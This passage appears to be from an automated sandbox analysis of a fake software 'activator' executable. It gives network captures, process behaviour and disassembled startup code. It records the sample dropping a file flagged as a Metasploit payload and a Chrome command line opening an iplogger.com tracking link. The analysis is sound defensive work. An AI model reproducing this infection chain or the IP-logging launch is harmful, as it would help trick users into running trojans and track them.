                                                                                                                                                                                                                                                Data Ascii: 3097C1ufnqMih6ay4r+3b0PDztMT18vPrx9vQ/d/+9u0A9MPT4wbdANXp4MfaCsrKyv3P/uQDBOv3Fxcg7yDf7O0U3xf6JQcT6gsiAgEQBOoNMgMuKDkHOzcZET4oITw+Lj4jHQcnPh4eLCAHKk4fSkRUM1dTNENaRD1YOEpaPmMjQ1o6N0g8I0NqO2ZgcGV0PmAvNEtzV2c7fWhST4BrQ2ODeXOIg4NVVnxIf2ONblBTclVoloRYamycXF9/m3


                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                28192.168.2.649754104.18.95.414436088C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                2024-10-03 14:09:33 UTC487OUTGET /cdn-cgi/challenge-platform/h/g/flow/ov1/1300389161:1727962023:QSoqQkjz0PpYr1szVnKI7X7Fbyyo_-jod5ykE5mZtpI/8ccd8289bc184228/6e64b4d206e3507 HTTP/1.1
                                                                                                                                                                                                                                                Host: challenges.cloudflare.com
                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                Sec-Fetch-Site: none
                                                                                                                                                                                                                                                Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                2024-10-03 14:09:33 UTC349INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                Date: Thu, 03 Oct 2024 14:09:33 GMT
                                                                                                                                                                                                                                                Content-Type: application/json
                                                                                                                                                                                                                                                Content-Length: 7
                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                cf-chl-out: QOiLYE8wEsp0SwUdMc704Xr/gSsNVTUxfP4=$G+0B1Zllu6rs3cVR
                                                                                                                                                                                                                                                cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                                CF-RAY: 8ccd82bad9ff43be-EWR
                                                                                                                                                                                                                                                2024-10-03 14:09:33 UTC7INData Raw: 69 6e 76 61 6c 69 64
                                                                                                                                                                                                                                                Data Ascii: invalid


                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                29192.168.2.64975520.12.23.50443
                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                2024-10-03 14:09:54 UTC306OUTGET /SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=KGDWMUGzXSzGHLb&MD=tbZlVl+h HTTP/1.1
                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33
                                                                                                                                                                                                                                                Host: slscr.update.microsoft.com
                                                                                                                                                                                                                                                2024-10-03 14:09:54 UTC560INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                                                                Content-Type: application/octet-stream
                                                                                                                                                                                                                                                Expires: -1
                                                                                                                                                                                                                                                Last-Modified: Mon, 01 Jan 0001 00:00:00 GMT
                                                                                                                                                                                                                                                ETag: "vic+p1MiJJ+/WMnK08jaWnCBGDfvkGRzPk9f8ZadQHg=_1440"
                                                                                                                                                                                                                                                MS-CorrelationId: 355ab080-9d74-43f8-99d4-a6ac73cb711b
                                                                                                                                                                                                                                                MS-RequestId: abb4026c-e94e-44c8-b227-f56ccc5bfb8d
                                                                                                                                                                                                                                                MS-CV: bWhAE2NSDEOVxncI.0
                                                                                                                                                                                                                                                X-Microsoft-SLSClientCache: 1440
                                                                                                                                                                                                                                                Content-Disposition: attachment; filename=environment.cab
                                                                                                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                Date: Thu, 03 Oct 2024 14:09:54 GMT
                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                Content-Length: 30005
                                                                                                                                                                                                                                                2024-10-03 14:09:54 UTC15824INData Raw: 4d 53 43 46 00 00 00 00 8d 2b 00 00 00 00 00 00 44 00 00 00 00 00 00 00 03 01 01 00 01 00 04 00 5b 49 00 00 14 00 00 00 00 00 10 00 8d 2b 00 00 a8 49 00 00 00 00 00 00 00 00 00 00 64 00 00 00 01 00 01 00 72 4d 00 00 00 00 00 00 00 00 00 00 00 00 80 00 65 6e 76 69 72 6f 6e 6d 65 6e 74 2e 63 61 62 00 fe f6 51 be 21 2b 72 4d 43 4b ed 7c 05 58 54 eb da f6 14 43 49 37 0a 02 d2 b9 86 0e 41 52 a4 1b 24 a5 bb 43 24 44 18 94 90 92 52 41 3a 05 09 95 ee 54 b0 00 91 2e e9 12 10 04 11 c9 6f 10 b7 a2 67 9f bd cf 3e ff b7 ff b3 bf 73 ed e1 9a 99 f5 c6 7a d7 bb de f5 3e cf fd 3c f7 dc 17 4a 1a 52 e7 41 a8 97 1e 14 f4 e5 25 7d f4 05 82 82 c1 20 30 08 06 ba c3 05 02 11 7f a9 c1 ff d2 87 5c 1e f4 ed 65 8e 7a 1f f6 0a 40 03 1d 7b f9 83 2c 1c 2f db b8 3a 39 3a 58 38 ba 73 5e
                                                                                                                                                                                                                                                Data Ascii: MSCF+D[I+IdrMenvironment.cabQ!+rMCK|XTCI7AR$C$DRA:T.og>sz><JRA%} 0\ez@{,/:9:X8s^
                                                                                                                                                                                                                                                2024-10-03 14:09:54 UTC14181INData Raw: 06 03 55 04 06 13 02 55 53 31 13 30 11 06 03 55 04 08 13 0a 57 61 73 68 69 6e 67 74 6f 6e 31 10 30 0e 06 03 55 04 07 13 07 52 65 64 6d 6f 6e 64 31 1e 30 1c 06 03 55 04 0a 13 15 4d 69 63 72 6f 73 6f 66 74 20 43 6f 72 70 6f 72 61 74 69 6f 6e 31 26 30 24 06 03 55 04 03 13 1d 4d 69 63 72 6f 73 6f 66 74 20 54 69 6d 65 2d 53 74 61 6d 70 20 50 43 41 20 32 30 31 30 30 1e 17 0d 32 33 31 30 31 32 31 39 30 37 32 35 5a 17 0d 32 35 30 31 31 30 31 39 30 37 32 35 5a 30 81 d2 31 0b 30 09 06 03 55 04 06 13 02 55 53 31 13 30 11 06 03 55 04 08 13 0a 57 61 73 68 69 6e 67 74 6f 6e 31 10 30 0e 06 03 55 04 07 13 07 52 65 64 6d 6f 6e 64 31 1e 30 1c 06 03 55 04 0a 13 15 4d 69 63 72 6f 73 6f 66 74 20 43 6f 72 70 6f 72 61 74 69 6f 6e 31 2d 30 2b 06 03 55 04 0b 13 24 4d 69 63 72 6f
                                                                                                                                                                                                                                                Data Ascii: UUS10UWashington10URedmond10UMicrosoft Corporation1&0$UMicrosoft Time-Stamp PCA 20100231012190725Z250110190725Z010UUS10UWashington10URedmond10UMicrosoft Corporation1-0+U$Micro


                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                30192.168.2.64975735.190.80.14436088C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                2024-10-03 14:10:22 UTC525OUTOPTIONS /report/v4?s=s6r14g6s0T1RrWk2y8Ac0rqnC%2FLVLKf2EBqQ3omkQ6J8Fu5v2uteSLetEpRzPZwZOe3Cty8FaC55S6Ug9Ti7cB8WbEk0McIbvpsM98kwIN1pc5t2ryHR8THhTApRoqQ%3D HTTP/1.1
                                                                                                                                                                                                                                                Host: a.nel.cloudflare.com
                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                Origin: https://iplogger.com
                                                                                                                                                                                                                                                Access-Control-Request-Method: POST
                                                                                                                                                                                                                                                Access-Control-Request-Headers: content-type
                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                2024-10-03 14:10:22 UTC336INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                                                                                access-control-max-age: 86400
                                                                                                                                                                                                                                                access-control-allow-methods: OPTIONS, POST
                                                                                                                                                                                                                                                access-control-allow-origin: *
                                                                                                                                                                                                                                                access-control-allow-headers: content-length, content-type
                                                                                                                                                                                                                                                date: Thu, 03 Oct 2024 14:10:22 GMT
                                                                                                                                                                                                                                                Via: 1.1 google
                                                                                                                                                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                Connection: close


                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                31192.168.2.64975835.190.80.14436088C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                2024-10-03 14:10:22 UTC537OUTOPTIONS /report/v4?s=8QZ0N5GYE%2FQjzGUJlP62kh8Njave9zbqER%2BeJnNlnXQEFViktq7fh2msQPW%2BH7EOrMbGiERjfuF5tX%2Fjmt91iBNAC1V76eA1aIGOMD%2Fz9L%2BGU3Kj4C%2BIDjDLNXyDzbQ%3D HTTP/1.1
                                                                                                                                                                                                                                                Host: a.nel.cloudflare.com
                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                Origin: https://iplogger.com
                                                                                                                                                                                                                                                Access-Control-Request-Method: POST
                                                                                                                                                                                                                                                Access-Control-Request-Headers: content-type
                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                2024-10-03 14:10:22 UTC336INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                                                                                access-control-max-age: 86400
                                                                                                                                                                                                                                                access-control-allow-methods: OPTIONS, POST
                                                                                                                                                                                                                                                access-control-allow-origin: *
                                                                                                                                                                                                                                                access-control-allow-headers: content-type, content-length
                                                                                                                                                                                                                                                date: Thu, 03 Oct 2024 14:10:22 GMT
                                                                                                                                                                                                                                                Via: 1.1 google
                                                                                                                                                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                Connection: close


                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                32192.168.2.64976035.190.80.14436088C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                2024-10-03 14:10:22 UTC470OUTPOST /report/v4?s=s6r14g6s0T1RrWk2y8Ac0rqnC%2FLVLKf2EBqQ3omkQ6J8Fu5v2uteSLetEpRzPZwZOe3Cty8FaC55S6Ug9Ti7cB8WbEk0McIbvpsM98kwIN1pc5t2ryHR8THhTApRoqQ%3D HTTP/1.1
                                                                                                                                                                                                                                                Host: a.nel.cloudflare.com
                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                Content-Length: 394
                                                                                                                                                                                                                                                Content-Type: application/reports+json
                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                2024-10-03 14:10:22 UTC394OUTData Raw: 5b 7b 22 61 67 65 22 3a 35 38 38 39 32 2c 22 62 6f 64 79 22 3a 7b 22 65 6c 61 70 73 65 64 5f 74 69 6d 65 22 3a 31 31 30 31 2c 22 6d 65 74 68 6f 64 22 3a 22 47 45 54 22 2c 22 70 68 61 73 65 22 3a 22 61 70 70 6c 69 63 61 74 69 6f 6e 22 2c 22 70 72 6f 74 6f 63 6f 6c 22 3a 22 68 74 74 70 2f 31 2e 31 22 2c 22 72 65 66 65 72 72 65 72 22 3a 22 22 2c 22 73 61 6d 70 6c 69 6e 67 5f 66 72 61 63 74 69 6f 6e 22 3a 31 2e 30 2c 22 73 65 72 76 65 72 5f 69 70 22 3a 22 31 37 32 2e 36 37 2e 31 38 38 2e 31 37 38 22 2c 22 73 74 61 74 75 73 5f 63 6f 64 65 22 3a 34 30 33 2c 22 74 79 70 65 22 3a 22 68 74 74 70 2e 65 72 72 6f 72 22 7d 2c 22 74 79 70 65 22 3a 22 6e 65 74 77 6f 72 6b 2d 65 72 72 6f 72 22 2c 22 75 72 6c 22 3a 22 68 74 74 70 73 3a 2f 2f 69 70 6c 6f 67 67 65 72 2e 63
                                                                                                                                                                                                                                                Data Ascii: [{"age":58892,"body":{"elapsed_time":1101,"method":"GET","phase":"application","protocol":"http/1.1","referrer":"","sampling_fraction":1.0,"server_ip":"172.67.188.178","status_code":403,"type":"http.error"},"type":"network-error","url":"https://iplogger.c
                                                                                                                                                                                                                                                2024-10-03 14:10:22 UTC168INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                                                                                date: Thu, 03 Oct 2024 14:10:22 GMT
                                                                                                                                                                                                                                                Via: 1.1 google
                                                                                                                                                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                Connection: close


                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                33192.168.2.64975935.190.80.14436088C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                2024-10-03 14:10:22 UTC482OUTPOST /report/v4?s=8QZ0N5GYE%2FQjzGUJlP62kh8Njave9zbqER%2BeJnNlnXQEFViktq7fh2msQPW%2BH7EOrMbGiERjfuF5tX%2Fjmt91iBNAC1V76eA1aIGOMD%2Fz9L%2BGU3Kj4C%2BIDjDLNXyDzbQ%3D HTTP/1.1
                                                                                                                                                                                                                                                Host: a.nel.cloudflare.com
                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                Content-Length: 524
                                                                                                                                                                                                                                                Content-Type: application/reports+json
                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                2024-10-03 14:10:22 UTC524OUTData Raw: 5b 7b 22 61 67 65 22 3a 35 34 37 37 33 2c 22 62 6f 64 79 22 3a 7b 22 65 6c 61 70 73 65 64 5f 74 69 6d 65 22 3a 31 32 38 39 2c 22 6d 65 74 68 6f 64 22 3a 22 47 45 54 22 2c 22 70 68 61 73 65 22 3a 22 61 70 70 6c 69 63 61 74 69 6f 6e 22 2c 22 70 72 6f 74 6f 63 6f 6c 22 3a 22 68 74 74 70 2f 31 2e 31 22 2c 22 72 65 66 65 72 72 65 72 22 3a 22 22 2c 22 73 61 6d 70 6c 69 6e 67 5f 66 72 61 63 74 69 6f 6e 22 3a 31 2e 30 2c 22 73 65 72 76 65 72 5f 69 70 22 3a 22 31 30 34 2e 32 31 2e 37 36 2e 35 37 22 2c 22 73 74 61 74 75 73 5f 63 6f 64 65 22 3a 34 30 34 2c 22 74 79 70 65 22 3a 22 68 74 74 70 2e 65 72 72 6f 72 22 7d 2c 22 74 79 70 65 22 3a 22 6e 65 74 77 6f 72 6b 2d 65 72 72 6f 72 22 2c 22 75 72 6c 22 3a 22 68 74 74 70 73 3a 2f 2f 69 70 6c 6f 67 67 65 72 2e 63 6f 6d
                                                                                                                                                                                                                                                Data Ascii: [{"age":54773,"body":{"elapsed_time":1289,"method":"GET","phase":"application","protocol":"http/1.1","referrer":"","sampling_fraction":1.0,"server_ip":"104.21.76.57","status_code":404,"type":"http.error"},"type":"network-error","url":"https://iplogger.com
                                                                                                                                                                                                                                                2024-10-03 14:10:22 UTC168INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                                                                                date: Thu, 03 Oct 2024 14:10:22 GMT
                                                                                                                                                                                                                                                Via: 1.1 google
                                                                                                                                                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                Connection: close


                                                                                                                                                                                                                                                Statistics

                                                                                                                                                                                                                                                CPU Usage

                                                                                                                                                                                                                                                Click to jump to process

                                                                                                                                                                                                                                                Memory Usage

                                                                                                                                                                                                                                                Click to jump to process

                                                                                                                                                                                                                                                Behavior

                                                                                                                                                                                                                                                Click to jump to process

                                                                                                                                                                                                                                                System Behavior

                                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                                Target ID:0
                                                                                                                                                                                                                                                Start time:10:08:58
                                                                                                                                                                                                                                                Start date:03/10/2024
                                                                                                                                                                                                                                                Path:C:\Users\user\Desktop\Activator by URKE v2.5.exe
                                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                                Commandline:"C:\Users\user\Desktop\Activator by URKE v2.5.exe"
                                                                                                                                                                                                                                                Imagebase:0x7ff7e5ef0000
                                                                                                                                                                                                                                                File size:25'037'648 bytes
                                                                                                                                                                                                                                                MD5 hash:95D5F32AFD610E2E7077BD350EAC99C0
                                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                                Target ID:2
                                                                                                                                                                                                                                                Start time:10:09:01
                                                                                                                                                                                                                                                Start date:03/10/2024
                                                                                                                                                                                                                                                Path:C:\Users\user\AppData\Local\Temp\RarSFX0\n3.exe
                                                                                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                                                                                Commandline:"C:\Users\user\AppData\Local\Temp\RarSFX0\n3.exe"
                                                                                                                                                                                                                                                Imagebase:0x720000
                                                                                                                                                                                                                                                File size:17'110'528 bytes
                                                                                                                                                                                                                                                MD5 hash:2706AC6F789E6BDBDA8DAE9D8460FEC8
                                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                Yara matches:
                                                                                                                                                                                                                                                • Rule: Msfpayloads_msf_9, Description: Metasploit Payloads - file msf.war - contents, Source: 00000002.00000003.2196083271.0000000002C7C000.00000004.00001000.00020000.00000000.sdmp, Author: Florian Roth
                                                                                                                                                                                                                                                • Rule: Msfpayloads_msf_9, Description: Metasploit Payloads - file msf.war - contents, Source: 00000002.00000002.2287277784.0000000002C7C000.00000004.00001000.00020000.00000000.sdmp, Author: Florian Roth
                                                                                                                                                                                                                                                Antivirus matches:
                                                                                                                                                                                                                                                • Detection: 62%, ReversingLabs
                                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                                Target ID:3
                                                                                                                                                                                                                                                Start time:10:09:10
                                                                                                                                                                                                                                                Start date:03/10/2024
                                                                                                                                                                                                                                                Path:C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                                                                                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                                                                                Commandline:"C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"
                                                                                                                                                                                                                                                Imagebase:0x540000
                                                                                                                                                                                                                                                File size:231'736 bytes
                                                                                                                                                                                                                                                MD5 hash:A64BEAB5D4516BECA4C40B25DC0C1CD8
                                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                Reputation:moderate
                                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                                Target ID:6
                                                                                                                                                                                                                                                Start time:10:09:18
                                                                                                                                                                                                                                                Start date:03/10/2024
                                                                                                                                                                                                                                                Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                                Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://iplogger.com/1KhnJ4
                                                                                                                                                                                                                                                Imagebase:0x7ff684c40000
                                                                                                                                                                                                                                                File size:3'242'272 bytes
                                                                                                                                                                                                                                                MD5 hash:5BBFA6CBDF4C254EB368D534F9E23C92
                                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                Reputation:high
                                                                                                                                                                                                                                                Has exited:false

                                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                                Target ID:8
                                                                                                                                                                                                                                                Start time:10:09:19
                                                                                                                                                                                                                                                Start date:03/10/2024
                                                                                                                                                                                                                                                Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                                Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2040 --field-trial-handle=2008,i,1522399523458594779,8666875280555869033,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                                                                                                                                                                                                                                                Imagebase:0x7ff684c40000
                                                                                                                                                                                                                                                File size:3'242'272 bytes
                                                                                                                                                                                                                                                MD5 hash:5BBFA6CBDF4C254EB368D534F9E23C92
                                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                Reputation:high
                                                                                                                                                                                                                                                Has exited:false

                                                                                                                                                                                                                                                Disassembly

                                                                                                                                                                                                                                                Reset < >

                                                                                                                                                                                                                                                  Execution Graph

                                                                                                                                                                                                                                                  Execution Coverage:13.4%
                                                                                                                                                                                                                                                  Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                                                                  Signature Coverage:31.5%
                                                                                                                                                                                                                                                  Total number of Nodes:2000
                                                                                                                                                                                                                                                  Total number of Limit Nodes:35
                                                                                                                                                                                                                                                  execution_graph 22415 7ff7e5f14f2d 22416 7ff7e5f14e65 22415->22416 22418 7ff7e5f15390 22416->22418 22444 7ff7e5f14fe8 22418->22444 22421 7ff7e5f1541b 22422 7ff7e5f152f8 DloadReleaseSectionWriteAccess 6 API calls 22421->22422 22423 7ff7e5f15428 RaiseException 22422->22423 22424 7ff7e5f15645 22423->22424 22424->22416 22425 7ff7e5f154cd LoadLibraryExA 22427 7ff7e5f15539 22425->22427 22428 7ff7e5f154e4 GetLastError 22425->22428 22426 7ff7e5f15615 22452 7ff7e5f152f8 22426->22452 22430 7ff7e5f1554d 22427->22430 22433 7ff7e5f15544 FreeLibrary 22427->22433 22431 7ff7e5f154f9 22428->22431 22432 7ff7e5f1550e 22428->22432 22429 7ff7e5f155ab GetProcAddress 22429->22426 22437 7ff7e5f155c0 GetLastError 22429->22437 22430->22426 22430->22429 22431->22427 22431->22432 22436 7ff7e5f152f8 DloadReleaseSectionWriteAccess 6 API calls 22432->22436 22433->22430 22434 7ff7e5f15444 22434->22425 22434->22426 22434->22427 22434->22430 22438 7ff7e5f1551b RaiseException 22436->22438 22439 7ff7e5f155d5 22437->22439 22438->22424 22439->22426 22440 7ff7e5f152f8 DloadReleaseSectionWriteAccess 6 API calls 22439->22440 22441 7ff7e5f155f7 RaiseException 22440->22441 22442 7ff7e5f14fe8 DloadAcquireSectionWriteAccess 6 API calls 22441->22442 22443 7ff7e5f15611 22442->22443 22443->22426 22445 7ff7e5f15063 22444->22445 22446 7ff7e5f14ffe 22444->22446 22445->22421 22445->22434 22460 7ff7e5f15094 22446->22460 22449 7ff7e5f1505e 22451 7ff7e5f15094 DloadReleaseSectionWriteAccess 3 API calls 22449->22451 22451->22445 22453 7ff7e5f15308 22452->22453 22459 7ff7e5f15361 22452->22459 22454 7ff7e5f15094 DloadReleaseSectionWriteAccess 3 API calls 22453->22454 22455 7ff7e5f1530d 22454->22455 22456 7ff7e5f1535c 22455->22456 22457 7ff7e5f15268 DloadProtectSection 3 API calls 22455->22457 22458 7ff7e5f15094 DloadReleaseSectionWriteAccess 3 API calls 22456->22458 22457->22456 22458->22459 22459->22424 22461 7ff7e5f150af 22460->22461 22462 7ff7e5f15003 22460->22462 22461->22462 22463 7ff7e5f150b4 GetModuleHandleW 22461->22463 22462->22449 22467 7ff7e5f15268 22462->22467 22464 7ff7e5f150c9 22463->22464 22465 7ff7e5f150ce GetProcAddress 22463->22465 22464->22462 22465->22464 22466 7ff7e5f150e3 GetProcAddress 22465->22466 22466->22464 22470 7ff7e5f1528a DloadProtectSection 22467->22470 22468 7ff7e5f15292 22468->22449 22469 7ff7e5f152ca VirtualProtect 22469->22468 22470->22468 22470->22469 22472 7ff7e5f15134 VirtualQuery GetSystemInfo 22470->22472 22472->22469 22475 7ff7e5f14f32 22476 7ff7e5f15390 _com_raise_error 14 API calls 22475->22476 22477 7ff7e5f14f71 22476->22477 22504 7ff7e5f1653c 22527 7ff7e5f15fc4 22504->22527 22507 7ff7e5f16688 22645 7ff7e5f16940 7 API calls 2 library calls 22507->22645 22508 7ff7e5f16558 __scrt_acquire_startup_lock 22510 7ff7e5f16692 22508->22510 22518 7ff7e5f16576 __scrt_release_startup_lock 22508->22518 22646 7ff7e5f16940 7 API calls 2 library calls 22510->22646 22512 7ff7e5f1659b 22513 7ff7e5f1669d abort 22514 7ff7e5f16621 22535 7ff7e5f16a8c 22514->22535 22516 7ff7e5f16626 22538 7ff7e5f20200 22516->22538 22518->22512 22518->22514 22642 7ff7e5f1f530 35 API calls __GSHandlerCheck_EH 22518->22642 22647 7ff7e5f16780 22527->22647 22530 7ff7e5f15ff3 22649 7ff7e5f20130 22530->22649 22531 7ff7e5f15fef 22531->22507 22531->22508 22666 7ff7e5f174c0 22535->22666 22537 7ff7e5f16aa3 GetStartupInfoW 22537->22516 22668 7ff7e5f23bc0 22538->22668 22540 7ff7e5f2020f 22541 7ff7e5f1662e 22540->22541 22672 7ff7e5f23f50 35 API calls swprintf 22540->22672 22543 7ff7e5f1400c 22541->22543 22544 7ff7e5f14046 22543->22544 22545 7ff7e5ef7a28 35 API calls 22544->22545 22546 7ff7e5f14052 22545->22546 22674 7ff7e5f0d0a8 22546->22674 22548 7ff7e5f1405c memcpy_s 22679 7ff7e5f0d724 22548->22679 22550 7ff7e5f140d1 22551 7ff7e5f14226 GetCommandLineW 22550->22551 22612 7ff7e5f14694 22550->22612 22554 7ff7e5f14238 22551->22554 22602 7ff7e5f143fa 22551->22602 22552 7ff7e5f1ae94 _invalid_parameter_noinfo_noreturn 31 API calls 22553 7ff7e5f1469a 22552->22553 22557 7ff7e5f1ae94 _invalid_parameter_noinfo_noreturn 31 API calls 22553->22557 22558 7ff7e5ef12bc 33 API calls 22554->22558 22555 7ff7e5ef7c10 34 API calls 22556 7ff7e5f14409 22555->22556 22559 7ff7e5ef1b70 31 API calls 22556->22559 22563 7ff7e5f14420 BuildCatchObjectHelperInternal 22556->22563 22567 7ff7e5f146a0 22557->22567 22561 7ff7e5f1425d 22558->22561 22559->22563 22560 7ff7e5ef1b70 31 API calls 22564 7ff7e5f1444b SetEnvironmentVariableW GetLocalTime 22560->22564 22746 7ff7e5f10620 131 API calls 3 library calls 22561->22746 22562 7ff7e5efbbf8 shared_ptr 31 API calls 22578 7ff7e5f1471e 22562->22578 22563->22560 22568 7ff7e5ef61e8 swprintf 46 API calls 22564->22568 22566 7ff7e5f14267 22566->22553 22572 7ff7e5f142b1 OpenFileMappingW 22566->22572 22573 7ff7e5f14393 22566->22573 22567->22562 22641 7ff7e5f14949 22567->22641 22569 7ff7e5f144d0 SetEnvironmentVariableW GetModuleHandleW LoadIconW 22568->22569 22689 7ff7e5f0eb64 LoadBitmapW 22569->22689 22570 7ff7e5f1ae94 _invalid_parameter_noinfo_noreturn 31 API calls 22571 7ff7e5f14969 22570->22571 22579 7ff7e5f15390 _com_raise_error 14 API calls 22571->22579 22575 7ff7e5f14388 CloseHandle 22572->22575 22576 7ff7e5f142d1 MapViewOfFile 